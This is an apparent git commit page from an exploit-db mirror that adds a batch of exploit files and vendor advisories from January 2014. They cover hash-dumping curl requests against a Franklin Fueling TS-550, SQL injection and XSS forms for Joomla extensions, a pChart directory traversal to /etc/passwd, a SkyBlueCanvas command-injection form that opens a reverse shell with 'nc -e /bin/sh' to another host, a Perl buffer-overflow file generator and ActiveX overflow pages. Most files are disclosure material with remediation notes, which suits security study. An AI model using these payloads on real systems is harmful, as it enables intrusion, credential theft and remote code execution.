bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 01_26_2014

Browse source
This commit is contained in:
Offensive Security 2014-01-26 04:24:08 +00:00
parent d2bf97c490
commit 38a3e9c9c4
14 changed files with 1461 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
files.csv
View file

@ -27988,3 +27988,16 @@ id,file,description,date,author,platform,type,port
31162,platforms/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 Directory Traversal and Denial of Service Vulnerabilities",2008-02-12,"Luigi Auriemma",windows,remote,0
31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component 'user_id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 (.EBP) Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0
31171,platforms/php/webapps/31171.txt,"XOS Shop 1.0 rc7o (redirect.php, goto param) - SQL Injection Vulnerability",2014-01-24,"JoKeR DZ",php,webapps,80
31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80
31174,platforms/php/webapps/31174.txt,"Joomla Komento Extension 1.7.2 - Stored XSS Vulnerabilities",2014-01-24,"High-Tech Bridge SA",php,webapps,80
31175,platforms/php/webapps/31175.txt,"Joomla JV Comment Extension 3.0.2 (index.php, id param) - SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80
31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
31177,platforms/windows/dos/31177.html,"MW6 Technologies DataMatrix ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 ActiveX (IconCreate Method) - Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0
31180,platforms/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001
31181,platforms/windows/remote/31181.rb,"HP Data Protector Backup Client Service Directory Traversal",2014-01-24,metasploit,windows,remote,5555
31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
31183,platforms/php/webapps/31183.txt,"SkyBlueCanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80

Can't render this file because it is too large.

127
platforms/hardware/webapps/31180.txt Executable file
View file

@ -0,0 +1,127 @@
Trustwave's SpiderLabs Security Advisory TWSL2014-001:
Multiple Vulnerabilities in Franklin Fueling's TS-550 evo
Published: 01/03/2014
Version: 1.0
Vendor: Franklin Fueling Systems (http://www.franklinfueling.com/)
Product: TS-550 evo device
Version affected: Firmware 2.0.0.6833 confirmed. Affects prior to version
2.4.0
Product description:
A fuel management system with a programmable interface used for inventory
and delivery management.
Finding 1: Insufficient Access Control
Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs
CVE: CVE-2013-7247
CWE: CWE-200
As the Guest user (the lowest privilege), a user can post the
cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the
usernames and password hashes (in DES format) for all users of the
application. Once dumped, they can be cracked and used to access
authenticated portions of the application.
#Request
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi
#Response
<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>
<DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>
<ROLE_LIST>
<ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>
<ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>
<ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>
</ROLE_LIST>
</CONFIGURATION></TSA_RESPONSE></TSA_RESPONSE_LIST>
Finding 2: Hardcoded Technician Credentials
Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs
CVE: CVE-2013-7248
CWE: CWE-798
The three primary users on the TS550 are roleGuest, roleUser, and
roleAdmin. Another user exists with additional access named roleDiag. This
user can access extra portions of the application such as the command line
interface, enable and disable SSH, as well as run SQL commands all from the
web interface. The CLI interface includes the ability to run engineering
and manufacturing commands. The password for roleDiag is the key (a value
returned with every POST request to tsaws.cgi) DES encrypted. This can be
done in Ruby:
$ irb
1.9.3p374 :001 > "11111111".crypt("aa")
=> "aaDTlAa1fGGC."
#Request
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST PASSWORD="aaDTlAa1fGGC."><TSA_REQUEST COMMAND="cmdWebCheckRole"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi
#Response (note the ROLE)
<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-03-04T16:53:01Z" TIME_STAMP_LOCAL="2013-03-04T11:53:01" KEY="11111111" ROLE="roleDiag"><TSA_RESPONSE COMMAND="cmdWebCheckRole"></TSA_RESPONSE></TSA_RESPONSE_LIST>
The password can then be used to run various roleDiag commands. An attacker
can enable SSH, and since root's password is the same as roleAdmin, they
can completely compromise the device.
Remediation Steps:
According to Franklin Fueling, version 2.4.0 mitigates these
vulnerabilities. However, Trustwave SpiderLabs have not verified this fix.
Revision History:
04/16/13 - Vulnerability disclosed to vendor
12/18/13 - Fix released on a limited basis by vendor
01/03/14 - Advisory published
References
1. http://www.franklinfueling.com/evo/
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
________________________________
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.

43
platforms/php/webapps/31171.txt Executable file
View file

@ -0,0 +1,43 @@
################################################################################
# Exploit Title: XOS Shop_v1.0_rc7o Sql Injection Vulnerability
# Date: 23/01/2014
# Exploit Author: JoKeR_StEx
# Vendor Homepage: http://www.xos-shop.com/
# Software Link: http://xos-shop.com/main/index.php/cPath/25/
# Version: v1.0 rc7o
# Tested on: Windows PHP Version 6.0.0-dev
# CVE : [~]
##################################################################################
[-] Description :
XOS Shop is affected by Sql Injection Vulnerability
The Attacker Can inject some MYSQl and exploit it(get content of db)
[+] VUlnerability :
Affected File ==> redirect.php
Line 47;53
<?
switch($_GET['action']){
47: case 'url':
48: if (isset($_GET['goto']) && xos_not_null($_GET['goto'])) {
49: $check_query = xos_db_query("select products_url from " . TABLE_PRODUCTS_DESCRIPTION . " where products_url = '" . xos_db_input($_GET['goto']) . "' limit 1");
50: if (xos_db_num_rows($check_query)) {
51: xos_redirect('http://' . $_GET['goto'])
52: break;
53: }
?>
[-]Exploit
http://127.0.0.1/Xoshop/shop/redirect.php?action=url&goto='
http://127.0.0.1/Xoshop/shop/redirect.php?action=url&goto=[SQLI]
###################################################################################
# Gr33ting's : Asesino04 , Shield Dz , Drr.0ryx & All My Friedns
###################################################################################
eamil : jokerdz44@yahoo.fr
Facebook : fb.me/imadlilong.lasvegas
Twitter : @JoKeR_StEx

56
platforms/php/webapps/31173.txt Executable file
View file

@ -0,0 +1,56 @@
# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A
[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.
[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.
Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.
[2] Cross-Site Scripting (XSS):
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script>
This file uses multiple variables throughout the session, and most of
them are vulnerable to XSS attacks. Certain parameters are persistent
throughout the session and therefore persists until the user session
is active. The parameters are unfiltered.
Cross-Site Scripting remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.
[3] Disclosure timeline:
2014 January 16 - Vulnerability confirmed, vendor contacted
2014 January 17 - Vendor replied, responsible disclosure was orchestrated
2014 January 24 - Vendor was inquired about progress, vendor replied
and noted that the official patch is released.

73
platforms/php/webapps/31174.txt Executable file
View file

@ -0,0 +1,73 @@
Advisory ID: HTB23194
Product: Komento Joomla Extension
Vendor: Stack Ideas Sdn Bhd.
Vulnerable Version(s): 1.7.2 and probably prior
Tested Version: 1.7.2
Advisory Publication: January 2, 2014 [without technical details]
Vendor Notification: January 2, 2014
Vendor Patch: January 2, 2014
Public Disclosure: January 23, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-0793
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Komento Joomla Extension, which can be exploited to perform script insertion attacks.
1) Cross-Site Scripting (XSS) in Komento Joomla Extension: CVE-2014-0793
1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "website" HTTP POST parameter to "/?option=com_komento" URL. A remote attacker can submit a comment with specially crafted "Website" field and execute arbitrary HTML and script code in browser in context of the vulnerable website when a user clicks on the nickname of the malicious author.
The following exploitation example uses the "alert()" JavaScript function to display word "immuniweb" when user clicks on the attacker's nickname in comment:
<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl" value="component">
<input type="hidden" name="format" value="ajax"> <input type="hidden" name="no_html" value="1"> <input type="hidden" name="component" value="com_content"> <input type="hidden" name="cid" value="24"> <input type="hidden" name="comment" value="comment"> <input type="hidden" name="parent_id" value="0"> <input type="hidden" name="name" value="name"> <input type="hidden" name="email" value="email@email.com"> <input type="hidden" name="website" value='http://www.htbridge.com"
onclick="javascript:alert(/immuniweb/);"'>
<input type="hidden" name="subscribe" value="false"> <input type="hidden" name="latitude" value=''>
<input type="hidden" name="longitude" value="1"> <input type="hidden" name="address" value="1"> <input type="hidden" name="contentLink" value="http://joomla/"> <input type="hidden" name="pageItemId" value="435"> <input type="hidden" name="option" value="com_komento"> <input type="hidden" name="namespace" value="site.views.komento.addcomment">
<input type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" id="btn"> </form>
1.2 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "latitude" HTTP POST parameter to "/?option=com_komento" URL. A remote attacker can submit a comment with specially crafted "latitude" field and execute arbitrary HTML and script code in browser in context of the vulnerable website when a user clicks on the address of the malicious author.
The following exploitation example uses the "alert()" JavaScript function to display word "immuniweb" when user clicks on the attacker's address in comment:
<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl" value="component">
<input type="hidden" name="format" value="ajax"> <input type="hidden" name="no_html" value="1"> <input type="hidden" name="component" value="com_content"> <input type="hidden" name="cid" value="24"> <input type="hidden" name="comment" value="comment"> <input type="hidden" name="parent_id" value="0"> <input type="hidden" name="name" value="name"> <input type="hidden" name="email" value="email@email.com"> <input type="hidden" name="website" value='www.htbridge.com'>
<input type="hidden" name="subscribe" value="false"> <input type="hidden" name="latitude" value='"
onclick="javascript:alert(/imuniweb/);">'>
<input type="hidden" name="longitude" value="1"> <input type="hidden" name="address" value="1"> <input type="hidden" name="contentLink" value="http://joomla/"> <input type="hidden" name="pageItemId" value="435"> <input type="hidden" name="option" value="com_komento"> <input type="hidden" name="namespace" value="site.views.komento.addcomment">
<input type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" id="btn"> </form>
-----------------------------------------------------------------------------------------------
Solution:
Update to Komento 1.7.3
More Informaion:
http://stackideas.com/downloads/changelog/komento
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23194 - https://www.htbridge.com/advisory/HTB23194 - Cross-Site Scripting (XSS) in Komento Joomla Extension.
[2] Komento Joomla Extension - http://stackideas.com/ - Komento is a Joomla comment extension for articles and blogs in K2, EasyBlog, ZOO, Flexicontent, VirtueMart and redShop.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

60
platforms/php/webapps/31175.txt Executable file
View file

@ -0,0 +1,60 @@
Advisory ID: HTB23195
Product: JV Comment Joomla Extension
Vendor: joomlavi.com
Vulnerable Version(s): 3.0.2 and probably prior
Tested Version: 3.0.2
Advisory Publication: January 2, 2014 [without technical details]
Vendor Notification: January 2, 2014
Vendor Patch: January 14, 2014
Public Disclosure: January 23, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-0794
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in JV Comment Joomla Extension, which can be exploited to perform SQL Injection attacks.
1) SQL Injection in JV Comment Joomla Extension: CVE-2014-0794
The vulnerability exists due to insufficient validation of "id" HTTP POST parameter passed to "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.
The following exploitation example displays version of MySQL database:
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="option" value="com_jvcomment">
<input type="hidden" name="task" value="comment.like">
<input type="hidden" name="id" value="1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))">
<input type="submit" id="btn">
</form>
-----------------------------------------------------------------------------------------------
Solution:
Update to JV Comment 3.0.3
More Information:
http://extensions.joomla.org/extensions/contacts-and-feedback/articles-comments/23394
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23195 - https://www.htbridge.com/advisory/HTB23195 - SQL Injection in JV Comment Joomla Extension.
[2] JV Comment Joomla Extension - http://www.joomlavi.com/joomla-extensions/jv-comment.html - With JV Comment, adding a comment system to your articles is now as simple as installing a plug-in and adjusting a few parameters.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

55
platforms/php/webapps/31183.txt Executable file
View file

@ -0,0 +1,55 @@
Vulnerability in SkyBlueCanvas CMS
Vulnerability Type:
Remote Command Injection
Version Affected:
1.1 r248-03 (and probably prior versions)
Discovered by:
Scott Parish - Center for Internet Security
Vendor Information:
SkyBlueCanvas is an easy-to-use Web Content Management System, that makes it simple to keep the content of your site
fresh. You simply upload the software to your web server, and you are ready to start adding text and pictures to your
web site.
Vulnerability Details:
The SkyBlueCanvas Lightweight CMS application contains a remote command injection vulnerability within the form on the
Contact page. A remote un-authenticated user can exploit this vulnerability to force the webserver to execute commands
in the context of the vulnerable application. It is possible to exploit this vulnerability because the POST parameters
"name", "email", "subject", and "message" are not properly sanitized when submitted to the index.php?pid=4 page.
Arbitrary commands can be executed by injecting the following payload to a vulnerable parameter:
A"; <command>
Since the page does not display the results of the injected command (blind injection) then testing must be done using a
ping, nc, or similar command.
Proof of Concept Exploit Code:
<html>
<body>
<form action="http://localhost/index.php?pid=4"; method="post">
<input type="hidden" name="cid" value="3">
<input type="hidden" name="name" value="test&#34;&#59; nc -e /bin/sh 192.168.1.2 12345">
<input type="hidden" name="email" value="test">
<input type="hidden" name="subject" value="test">
<input type="hidden" name="message" value="test">
<input type="hidden" name="action" value="Send">
<input type="submit" value="submit">
</form>
</body>
</html>
References:
http://skybluecanvas.com/
Remediation:
The vendor has issued a fix to the vulnerability in version 1.1 r248-04
Revision History:
1/9/14 - Vulnerability discovered
1/10/14 - Vulnerability disclosed privately to vendor
1/22/14 - Patch released by vendor
1/23/14 - Vulnerability disclosed publicly
This message and attachments may contain confidential information. If it appears that this message was sent to you by
mistake, any retention, dissemination, distribution or copying of this message and attachments is strictly prohibited.
Please notify the sender immediately and permanently delete the message and any attachments.

107
platforms/windows/dos/31168.pl Executable file
View file

@ -0,0 +1,107 @@
?#!/usr/local/bin/perl
#
#
# NCH Software Express Burn Plus 4.68 EBP Project File Handling Buffer Overflow PoC
#
#
# Vendor: NCH Software
# Product web page: http://www.nchsoftware.com
# Affected version: 4.68
#
# Summary: Express Burn is a program that allows you to create and copy many
# kinds of disc media, including Audio (audio CDs / .mp3 CDs), Video (DVDs),
# and Data (CDs / DVDs / Blu-ray).
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a project file, which can be exploited to cause a unicode buffer overflow
# when a user opens e.g. a specially crafted .EBP file. Successful exploitation
# could allow execution of arbitrary code on the affected machine.
#
#
# ===========================================================================
#
# (1144.1488): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\NCH Software\ExpressBurn\expressburn.exe
# eax=03418568 ebx=004034ec ecx=00000041 edx=00011a98 esi=03429428 edi=001893df
# eip=004679ef esp=00185f18 ebp=00187254 iopl=0 nv up ei pl nz na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
# expressburn+0x679ef:
# 004679ef 66890c02 mov word ptr [edx+eax],cx ds:002b:0342a000=????
# 0:000> d eax
# 03418568 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 03418578 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 03418588 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 03418598 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 034185a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 034185b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 034185c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 034185d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#
# ===========================================================================
#
#
# Tested on: Microsoft Windows 7 Professional SP1 EN
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2014-5166
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5166.php
#
#
# 20.01.2014
#
use Cwd;
use LWP::Simple;
print "\n
#=---===---===---===---===---===---===---===---=#
| |
| Proof Of Concept script for |
| |
| NCH Software Express Burn Plus v4.68 |
| |
| |
| ID: ZSL-2014-5166 |
| |
| --- |
| |
| Copyleft (c) 2014 |
| |
| Zero Science Lab - http://www.zeroscience.mk |
| |
#=---===---===---===---===---===---===---===---=#
\n";
$file = "Exploit2.EBP";
$zoom = substr(")aZh4/",3,1).substr("^7ttr",2,2).substr("p>eErZ",0,1).
substr("7U:/.9",2,2).substr("v/!+T",1,1).substr("oL4z55",3,1).
substr("erY3%",0,2).substr("8oscW1",1,3).substr("iLien@",2,3).
substr("*hJ2ce",4,2).substr("6.#h1A",1,1).substr("mk-((",0,2).
substr(">/cZo",1,2).substr("[Mood]4",3,2).substr("lesS?",1,2).
substr("a*\@J/b",4,2).substr("lue8X",0,3).substr("fish6",0,4).
substr(",,8Y.b",4,1).substr("GrUmp!",3,2).substr("1337:",2,1);
print "\n\n\x20\x20\x1A Creating malicious project file...\n\n";
$decoy = "440Hz.mp3";
getstore($zoom, $decoy);
print "\x20\x20\x1A Throwing decoy file: $decoy...\n";
$buffer = "\x41\x41\x41\x41" x (15000/2);
$dir = getcwd;
$dir =~ s/\//\\/g;
$load = "<?xml version=\"1.0\"?>\<ExpressBurnProject type=\"0\"><Alb".
"umTitle/><TrackList><Audiotrack file=\"$dir\\$decoy\" title".
"=\"$buffer\" artist=\"Salvador\"/></TrackList>\r</ExpressBu".
"rnProject>\r";
open fp, ">./$file" || die "\n[-] Can't open $file: $!\n\n";
print fp $load; close fp;
print "\n\x20\x20\x19 File created successfully: $file ";
$file = -s $file; print "($file bytes)\n\n\n";

37
platforms/windows/dos/31176.html Executable file
View file

File diff suppressed because one or more lines are too long

50
platforms/windows/dos/31177.html Executable file
View file

File diff suppressed because one or more lines are too long

40
platforms/windows/dos/31178.html Executable file
View file

@ -0,0 +1,40 @@
<!--
===========================================================================
Problem: The Data parameter is subject to a buffer overflow DEFINITELY
leading to arbitrary code execution.
COM Object - {2355C601-37D1-42B4-BEB1-03C773298DC8} MW6MaxiCode Class
File Description : MaxiCode ActiveX
File Version : 4, 0, 0, 1
To trigger the overflow enter a string larger than 4000 characters.
In the PoC (mw6maxicode.html) you see that Internet Explorer crashes
at trying to copy 42424242 to a register. By disassembling near the
crash location, you can see that both EAX and ECX can be manipulated
respectively with values 41414141 and 42424242. These are later used
to write operations leading to an arbitrary 4 byte write.
===========================================================================
COM Object - {2355C601-37D1-42B4-BEB1-03C773298DC8} MW6MaxiCode Class
*******************************************************************************
COM Object Filename : C:\WINDOWS\system32\MaxiCode.dll
Major Version : 4
Minor Version : 0
Build Number : 0
Revision Number : 1
Product Version : 4, 0, 0, 1
Product Name : MaxiCode Module
Company Name :
Legal Copyright : Copyright 2009
Comments :
File Description : MaxiCode ActiveX
File Version : 4, 0, 0, 1
Internal Name : MaxiCode ActiveX
Legal Trademarks :
Private Build :
Special Build :
Language : not found
*******************************************************************************
-->
<object id=TestObj classid="CLSID:{2355C601-37D1-42B4-BEB1-03C773298DC8}" style="width:100;height:350">
<PARAM NAME="Data" VALUE="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6